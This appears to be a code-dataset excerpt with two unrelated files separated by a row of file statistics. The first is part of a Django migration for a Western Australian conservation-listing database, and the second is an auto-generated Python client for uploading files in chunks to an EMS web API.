60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'Inactive')], db_index=True, default=0, help_text='The approval status of the Gazettal.', max_length=50, verbose_name='Approval status')),
('proposed_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was proposed on.', null=True, verbose_name='Proposed on')),
('gazetted_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was gazetted on.', null=True, verbose_name='Gazetted on')),
('deactivated_on', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was deactivated on, most likely superseded by another Gazettal.', null=True, verbose_name='Deactivated on')),
('review_due', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal should be reviewed.', null=True, verbose_name='Review due date')),
('comments', models.TextField(help_text='Append comments on approval process as appropriate.', verbose_name='Comments')),
('community', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='taxonomy.Community')),
],
options={
'verbose_name': 'Community Gazettal',
'verbose_name_plural': 'Community Gazettals',
},
),
migrations.CreateModel(
name='ConservationCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(help_text='A category code, unique within its conservation list.',
max_length=500, verbose_name='Code')),
('label', models.CharField(help_text='An explanatory label.', max_length=500, verbose_name='Label')),
('description', models.TextField(help_text='A comprehensive description.', verbose_name='Description')),
],
options={
'verbose_name': 'Conservation Category',
'verbose_name_plural': 'Conservation Categories',
},
),
migrations.CreateModel(
name='ConservationCriterion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(help_text='A criterion code, unique within its conservation list.',
max_length=500, verbose_name='Code')),
('label', models.CharField(help_text='An explanatory label.', max_length=500, verbose_name='Label')),
('description', models.TextField(help_text='A comprehensive description.', verbose_name='Description')),
],
options={
'verbose_name': 'Conservation Criterion',
'verbose_name_plural': 'Conservation Criteria',
},
),
migrations.CreateModel(
name='ConservationList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('scope_wa', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable state-wide.', verbose_name='Applies to WA')),
('scope_cmw', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable nation-wide.', verbose_name='Applies to Commonwealth')),
('scope_intl', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable internationally.', verbose_name='Applies Internationally')),
('code', models.CharField(help_text='A Conservation List code.', max_length=500, unique=True, verbose_name='Code')),
('label', models.CharField(blank=True, help_text='An explanatory label.',
max_length=500, null=True, verbose_name='Label')),
('description', models.TextField(blank=True,
help_text='A comprehensive description.', null=True, verbose_name='Description')),
('active_from', models.DateTimeField(blank=True,
help_text='The date and time from which this list is current.', null=True, verbose_name='Active from')),
('active_to', models.DateTimeField(
blank=True, help_text='The date and time from which this list is non-current.', null=True, verbose_name='Active to')),
('scope_communities', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable to ecological communities.', verbose_name='Applies to Communities')),
('scope_species', models.BooleanField(db_index=True, default=False,
help_text='Whether this list is applicable to individual species.', verbose_name='Applies to Species')),
('approval_level', models.PositiveIntegerField(choices=[(10, 'Immediate'), (20, 'Panel'), (25, 'Director'), (
30, 'Minister')], default=30, help_text='What is the highest required approval instance for this list?', verbose_name='Approval Level')),
],
options={
'verbose_name': 'Conservation List',
'verbose_name_plural': 'Conservation Lists',
'ordering': ['-active_from'],
},
),
migrations.CreateModel(
name='TaxonGazettal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', django_fsm.FSMField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'Inactive')], db_index=True, default=0, help_text='The approval status of the Gazettal.', max_length=50, verbose_name='Approval status')),
('proposed_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was proposed on.', null=True, verbose_name='Proposed on')),
('gazetted_on', models.DateTimeField(blank=True,
help_text='The date and time this Gazettal was gazetted on.', null=True, verbose_name='Gazetted on')),
('deactivated_on', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was deactivated on, most likely superseded by another Gazettal.', null=True, verbose_name='Deactivated on')),
('review_due', models.DateTimeField(
blank=True, help_text='The date and time this Gazettal should be reviewed.', null=True, verbose_name='Review due date')),
('comments', models.TextField(blank=True,
help_text='Append comments on approval process as appropriate.', null=True, verbose_name='Comments')),
('criteria', models.ManyToManyField(help_text='The Conservation Criteria form the reason for the choice of conservation category.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria')),
('taxon', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='taxonomy.Taxon')),
],
options={
'verbose_name': 'Taxon Gazettal',
'verbose_name_plural': 'Taxon Gazettals',
},
),
migrations.AddField(
model_name='conservationcriterion',
name='conservation_list',
field=models.ForeignKey(help_text='The conservation list this code is described in.',
on_delete=django.db.models.deletion.CASCADE, to='conservation.ConservationList', verbose_name='Conservation List'),
),
migrations.AddField(
model_name='conservationcategory',
name='conservation_list',
field=models.ForeignKey(help_text='The conservation list this code is described in.',
on_delete=django.db.models.deletion.CASCADE, to='conservation.ConservationList', verbose_name='Conservation List'),
),
migrations.AddField(
model_name='communitygazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation categories.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AlterField(
model_name='conservationcriterion',
name='description',
field=models.TextField(blank=True, help_text='A comprehensive description.',
null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='conservationcriterion',
name='label',
field=models.CharField(blank=True, help_text='An explanatory label.',
max_length=500, null=True, verbose_name='Label'),
),
migrations.AlterUniqueTogether(
name='conservationcriterion',
unique_together={('conservation_list', 'code')},
),
migrations.AlterField(
model_name='conservationcategory',
name='description',
field=models.TextField(blank=True, help_text='A comprehensive description.',
null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='conservationcategory',
name='label',
field=models.CharField(blank=True, help_text='An explanatory label.',
max_length=500, null=True, verbose_name='Label'),
),
migrations.AlterUniqueTogether(
name='conservationcategory',
unique_together={('conservation_list', 'code')},
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m1',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m2',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m3',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_m4',
),
migrations.RemoveField(
model_name='communitygazettal',
name='is_s5',
),
migrations.AlterField(
model_name='communitygazettal',
name='comments',
field=models.TextField(
blank=True, help_text='Append comments on approval process as appropriate.', null=True, verbose_name='Comments'),
),
migrations.AddField(
model_name='communitygazettal',
name='category',
field=models.ManyToManyField(blank=True, help_text='The Conservation Categories can change during the approval process. Some combinations are valid, some are not.',
to='conservation.ConservationCategory', verbose_name='Conservation Categories'),
),
migrations.AddField(
model_name='taxongazettal',
name='category',
field=models.ManyToManyField(blank=True, help_text='The Conservation Categories can change during the approval process. Some combinations are valid, some are not.',
to='conservation.ConservationCategory', verbose_name='Conservation Categories'),
),
migrations.AlterField(
model_name='taxongazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation category.',
null=True, to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AddField(
model_name='communitygazettal',
name='category_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation categories.', null=True, verbose_name='Category list'),
),
migrations.AddField(
model_name='communitygazettal',
name='criteria_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation criteria.', null=True, verbose_name='Criteria list'),
),
migrations.AddField(
model_name='taxongazettal',
name='category_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation categories.', null=True, verbose_name='Category list'),
),
migrations.AddField(
model_name='taxongazettal',
name='criteria_cache',
field=models.TextField(
blank=True, help_text='An auto-generated list of conservation criteria.', null=True, verbose_name='Criteria list'),
),
migrations.AlterField(
model_name='taxongazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation category.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AddField(
model_name='communitygazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Gazettal minus the Taxon.', null=True, verbose_name='Gazettal label'),
),
migrations.AddField(
model_name='taxongazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Gazettal minus the Taxon.', null=True, verbose_name='Gazettal label'),
),
migrations.AlterField(
model_name='communitygazettal',
name='community',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='community_gazettal', to='taxonomy.Community'),
),
migrations.AlterField(
model_name='taxongazettal',
name='criteria',
field=models.ManyToManyField(blank=True, help_text='The Conservation Criteria form the reason for the choice of conservation categories.',
to='conservation.ConservationCriterion', verbose_name='Conservation Criteria'),
),
migrations.AlterField(
model_name='taxongazettal',
name='taxon',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,
related_name='taxon_gazettal', to='taxonomy.Taxon'),
),
migrations.RemoveField(
model_name='communitygazettal',
name='status',
),
migrations.RemoveField(
model_name='taxongazettal',
name='status',
),
migrations.AddField(
model_name='communitygazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'De-listed')], db_index=True, default=0, help_text='The approval status of the Gazettal.', verbose_name='Approval status'),
),
migrations.AddField(
model_name='taxongazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Gazetted'), (90, 'De-listed')], db_index=True, default=0, help_text='The approval status of the Gazettal.', verbose_name='Approval status'),
),
migrations.CreateModel(
name='FileAttachment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attachment', models.FileField(upload_to=conservation.models.fileattachment_media)),
('object_id', models.PositiveIntegerField()),
('title', models.CharField(blank=True, help_text='A self-explanatory title for the file attachment.',
max_length=500, null=True, verbose_name='Title')),
('author', models.ForeignKey(blank=True, help_text='The person who authored and endorsed this file.',
null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Author')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
('confidential', models.BooleanField(db_index=True, default=True,
help_text='Whether this file is confidential or can be released to the public.', verbose_name='Is confidential')),
('current', models.BooleanField(db_index=True, default=True,
help_text='Whether this file is current or an archived version.', verbose_name='Is current')),
],
),
migrations.AlterModelOptions(
name='conservationcategory',
options={'ordering': ['conservation_list', 'rank'], 'verbose_name': 'Conservation Category',
'verbose_name_plural': 'Conservation Categories'},
),
migrations.AlterModelOptions(
name='conservationcriterion',
options={'ordering': ['conservation_list', 'rank'],
'verbose_name': 'Conservation Criterion', 'verbose_name_plural': 'Conservation Criteria'},
),
migrations.AddField(
model_name='communitygazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CMW'), (2, 'INT'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AddField(
model_name='communitygazettal',
name='source',
field=models.PositiveIntegerField(choices=[(0, 'Manual entry'), (1, 'Threatened Fauna'), (2, 'Threatened Flora'), (
3, 'Threatened Communities')], default=0, help_text='Where was this record captured initially?', verbose_name='Data Source'),
),
migrations.AddField(
model_name='communitygazettal',
name='source_id',
field=models.CharField(blank=True, help_text='The ID of the record in the original source, if available.',
max_length=1000, null=True, verbose_name='Source ID'),
),
migrations.AddField(
model_name='taxongazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CMW'), (2, 'INT'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AddField(
model_name='taxongazettal',
name='source',
field=models.PositiveIntegerField(choices=[(0, 'Manual entry'), (1, 'Threatened Fauna'), (2, 'Threatened Flora'), (
3, 'Threatened Communities')], default=0, help_text='Where was this record captured initially?', verbose_name='Data Source'),
),
migrations.AddField(
model_name='taxongazettal',
name='source_id',
field=models.CharField(blank=True, help_text='The ID of the record in the original source, if available.',
max_length=1000, null=True, verbose_name='Source ID'),
),
migrations.AddField(
model_name='conservationcategory',
name='rank',
field=models.PositiveIntegerField(
blank=True, help_text='Display order, lowest number goes first.', null=True, verbose_name='Rank'),
),
migrations.AddField(
model_name='conservationcriterion',
name='rank',
field=models.PositiveIntegerField(
blank=True, help_text='Display order, lowest number goes first.', null=True, verbose_name='Rank'),
),
migrations.RemoveField(
model_name='communitygazettal',
name='deactivated_on',
),
migrations.RemoveField(
model_name='taxongazettal',
name='deactivated_on',
),
migrations.AddField(
model_name='communitygazettal',
name='delisted_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was de-listed, most likely superseded by another Gazettal.', null=True, verbose_name='De-listed on'),
),
migrations.AddField(
model_name='taxongazettal',
name='delisted_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Gazettal was de-listed, most likely superseded by another Gazettal.', null=True, verbose_name='De-listed on'),
),
migrations.CreateModel(
name='Document',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('document_type', models.PositiveIntegerField(choices=[(0, 'Recovery Plan'), (5, 'Interim Recovery Plan'), (10, 'Management Plan'), (20, 'Animal Ethics Application'), (
30, 'Fauna Translocation Proposal'), (40, 'Standard Operating Procedure')], default=0, help_text='The document type governs the approval process.', verbose_name='Document Type')),
('status', django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (40, 'In review with Branch Manager'), (45, 'In review with Regional Manager'), (50, 'In review with Division Director'), (20, 'In review with public'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Active'), (90, 'Closed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Gazettal.', verbose_name='Approval status')),
('effective_from', models.DateTimeField(
blank=True, help_text='The date from which this document is effective from.', null=True, verbose_name='Effective from')),
('effective_to', models.DateTimeField(blank=True,
help_text='The date to which this document is effective to.', null=True, verbose_name='Effective to')),
('effective_from_commonwealth', models.DateTimeField(
blank=True, help_text='The date from which this document was adopted by the Commonwealth.', null=True, verbose_name='Adopted by Commonwealth on')),
('effective_to_commonwealth', models.DateTimeField(
blank=True, help_text='The date on which this document was retired by the Commonwealth.', null=True, verbose_name='Retired by Commonwealth on')),
('review_due', models.DateTimeField(
blank=True, help_text='The date and time this Document should be reviewed.', null=True, verbose_name='Review due date')),
('title', models.CharField(help_text='A concise document title.', max_length=1000, verbose_name='Title')),
('comments', models.TextField(
blank=True, help_text='Optional comments on document approval and provenance.', null=True, verbose_name='Comments')),
('communities', models.ManyToManyField(blank=True, help_text='All communities this document applies to.',
to='taxonomy.Community', verbose_name='Communities')),
('taxa', models.ManyToManyField(blank=True, help_text='All taxa this document applies to.',
to='taxonomy.Taxon', verbose_name='Taxa')),
('team', models.ManyToManyField(blank=True, to=settings.AUTH_USER_MODEL,
verbose_name='Staff involved in the writing, approval, or publication of this document.')),
('source', models.PositiveIntegerField(choices=[(0, 'Manual entry'), (1, 'Threatened Fauna'), (2, 'Threatened Flora'), (
3, 'Threatened Communities')], default=0, help_text='Where was this record captured initially?', verbose_name='Data Source')),
('source_id', models.CharField(blank=True, help_text='The ID of the record in the original source, if available.',
max_length=1000, null=True, verbose_name='Source ID')),
('last_reviewed_on', models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was last reviewed.', null=True, verbose_name='Last reviewed on')),
],
options={
'ordering': ['document_type', 'title'],
'verbose_name': 'Document',
'verbose_name_plural': 'Documents',
},
),
migrations.AlterModelOptions(
name='communitygazettal',
options={'verbose_name': 'Community Conservation Listing',
'verbose_name_plural': 'Community Conservation Listings'},
),
migrations.AlterModelOptions(
name='taxongazettal',
options={'verbose_name': 'Taxon Conservation Listing',
'verbose_name_plural': 'Taxon Conservation Listings'},
),
migrations.RemoveField(
model_name='communitygazettal',
name='delisted_on',
),
migrations.RemoveField(
model_name='communitygazettal',
name='gazetted_on',
),
migrations.RemoveField(
model_name='taxongazettal',
name='delisted_on',
),
migrations.RemoveField(
model_name='taxongazettal',
name='gazetted_on',
),
migrations.AddField(
model_name='communitygazettal',
name='effective_from',
field=models.DateTimeField(
blank=True, help_text='The date printed on the Departmental Gazettal notice containing this Conservation Listing.', null=True, verbose_name='Effective from'),
),
migrations.AddField(
model_name='communitygazettal',
name='effective_to',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was de-listed or otherwise ceased to be in effect.', null=True, verbose_name='Effective to'),
),
migrations.AddField(
model_name='taxongazettal',
name='effective_from',
field=models.DateTimeField(
blank=True, help_text='The date printed on the Departmental Gazettal notice containing this Conservation Listing.', null=True, verbose_name='Effective from'),
),
migrations.AddField(
model_name='taxongazettal',
name='effective_to',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was de-listed or otherwise ceased to be in effect.', null=True, verbose_name='Effective to'),
),
migrations.AlterField(
model_name='communitygazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Conservation Listing.', null=True, verbose_name='Gazettal label'),
),
migrations.AlterField(
model_name='communitygazettal',
name='proposed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was proposed on.', null=True, verbose_name='Proposed on'),
),
migrations.AlterField(
model_name='communitygazettal',
name='review_due',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing should be reviewed.', null=True, verbose_name='Review due date'),
),
migrations.AlterField(
model_name='communitygazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Published'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
migrations.AlterField(
model_name='taxongazettal',
name='label_cache',
field=models.TextField(
blank=True, help_text='An auto-generated label for the Conservation Listing.', null=True, verbose_name='Gazettal label'),
),
migrations.AlterField(
model_name='taxongazettal',
name='proposed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was proposed on.', null=True, verbose_name='Proposed on'),
),
migrations.AlterField(
model_name='taxongazettal',
name='review_due',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing should be reviewed.', null=True, verbose_name='Review due date'),
),
migrations.AlterField(
model_name='taxongazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Published'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
migrations.AlterField(
model_name='communitygazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CWTH'), (2, 'IUCN'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AlterField(
model_name='taxongazettal',
name='scope',
field=models.PositiveIntegerField(choices=[(0, 'WA'), (1, 'CWTH'), (2, 'IUCN'), (
3, 'AP')], default=0, help_text='In which legislation does this Gazettal apply?', verbose_name='Scope'),
),
migrations.AddField(
model_name='communitygazettal',
name='last_reviewed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was last reviewed.', null=True, verbose_name='Last reviewed on'),
),
migrations.AddField(
model_name='taxongazettal',
name='last_reviewed_on',
field=models.DateTimeField(
blank=True, help_text='The date and time this Conservation Listing was last reviewed.', null=True, verbose_name='Last reviewed on'),
),
migrations.AddField(
model_name='conservationcategory',
name='current',
field=models.BooleanField(
db_index=True, default=True, help_text='Whether this category should be shown for new conservatin listings.', verbose_name='Is current'),
),
migrations.AlterField(
model_name='communitygazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Listed'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
migrations.AlterField(
model_name='taxongazettal',
name='status',
field=django_fsm.FSMIntegerField(choices=[(0, 'Proposed'), (10, 'In review with experts'), (20, 'In review with public'), (30, 'In review with panel'), (40, 'In review with Branch Manager'), (50, 'In review with Division Director'), (
60, 'In review with Director General'), (70, 'In review with Minister'), (80, 'Listed'), (90, 'De-listed'), (100, 'Rejected')], db_index=True, default=0, help_text='The approval status of the Conservation Listing.', verbose_name='Approval status'),
),
]
| 65.221284 | 634 | 0.602031 | 3,898 | 38,611 | 5.819395 | 0.095434 | 0.063525 | 0.033327 | 0.044966 | 0.817845 | 0.803209 | 0.757098 | 0.706313 | 0.699656 | 0.691986 | 0 | 0.027601 | 0.280283 | 38,611 | 591 | 635 | 65.331641 | 0.788693 | 0.002201 | 0 | 0.747423 | 1 | 0 | 0.361862 | 0.031098 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008591 | 0 | 0.017182 | 0.003436 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4c900647ee1be441e4c4494d5b1803421c9c0ee | 24,513 | py | Python | emsapi/operations/transfer_operations.py | ge-flight-analytics/emsapi-python | 2e3a53529758f1bd7a2a850119b1cc1b5ac552e3 | [
"MIT"
] | null | null | null | emsapi/operations/transfer_operations.py | ge-flight-analytics/emsapi-python | 2e3a53529758f1bd7a2a850119b1cc1b5ac552e3 | [
"MIT"
] | 2 | 2020-01-16T00:04:35.000Z | 2021-05-26T21:04:06.000Z | emsapi/operations/transfer_operations.py | ge-flight-analytics/emsapi-python | 2e3a53529758f1bd7a2a850119b1cc1b5ac552e3 | [
"MIT"
] | 1 | 2021-02-23T08:25:12.000Z | 2021-02-23T08:25:12.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import HttpOperationError
from .. import models
class TransferOperations(object):
"""TransferOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def start_async(
self, ems_system_id, request, custom_headers=None, raw=False, **operation_config):
"""Starts a new upload.
:param ems_system_id: The ID of the EMS system on which to start a new
upload.
:type ems_system_id: int
:param request: Information about the upload to start.
:type request: ~emsapi.models.AdiEmsWebApiV2DtoUploadUploadRequest
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.start_async.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(request, 'AdiEmsWebApiV2DtoUploadUploadRequest')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 401, 500, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadParameters', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 500:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
start_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads'}
def chunk_async(
self, ems_system_id, transfer_id, first, last, custom_headers=None, raw=False, **operation_config):
"""Uploads a chunk of a file. This will fail if any chunks have been
skipped in the specified file.
The practical limit for a single chunk is less than 4MB or so,
dependent on the web server's configuration.
If you receive 500 responses, try smaller chunk sizes.
:param ems_system_id: The ID of the EMS system to which the client is
uploading.
:type ems_system_id: int
:param transfer_id: The ID of the upload, returned originally by the
upload start call.
:type transfer_id: str
:param first: The byte index of the first byte that will be uploaded.
:type first: long
:param last: The byte index of the last byte that will be uploaded.
:type last: long
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.chunk_async.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
'transferId': self._serialize.url("transfer_id", transfer_id, 'str'),
'first': self._serialize.url("first", first, 'long'),
'last': self._serialize.url("last", last, 'long')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 400, 401, 404, 500, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadResult', response)
if response.status_code == 400:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 404:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 500:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
chunk_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}/{first}/{last}'}
def status(
self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
"""Gets the status of an upload in progress.
:param ems_system_id: The ID of the EMS system to which the client is
uploading.
:type ems_system_id: int
:param transfer_id: The ID of the upload, returned originally by the
upload start call.
:type transfer_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.status.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 401, 404, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadStatus', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 404:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
status.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}'}
def finish_async(
self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
"""Completes an existing upload in progress.
<p>This will examine everything that's been transferred to make sure
that it is intact, then
give a status report in response.</p>
<p>The use of this call is not required unless the file is being
streamed (i.e. there was no
totalSize passed in the beginning of the file). In that case, this call
is necessary to
tell the server that all data are received.</p>.
:param ems_system_id: The ID of the EMS system to which the client is
uploading.
:type ems_system_id: int
